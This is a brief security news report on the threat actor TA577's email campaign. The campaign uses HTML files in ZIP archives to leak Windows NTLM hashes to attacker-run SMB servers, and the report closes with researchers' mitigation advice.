Hundreds of organizations have been subjected to attacks by initial access broker TA577, also known as Hive0118, aimed at exfiltrating Windows NT LAN Manager authentication data during the past week, reports CSO Online.
Malicious emails leveraged by TA577 to hijack existing threads of legitimate messages consist of a password-protected ZIP archive containing an HTML document, which when opened establishes a connection with an attacker-controlled SMB server, according to a report from Proofpoint. Such a server was noted to be operating the open-source Impacket toolkit used for gathering NTLM hashes, which could be later utilized for NTLM relay intrusions, said researchers, who recommended the blocking of outbound connections to avert risks. "If the file scheme URI was sent directly in the email body, the attack would not work on Outlook mail clients patched since July 2023. Disabling guest access to SMB does not mitigate the attack, since the file must attempt to authenticate to the external SMB server to determine if it should use guest access," researchers added.
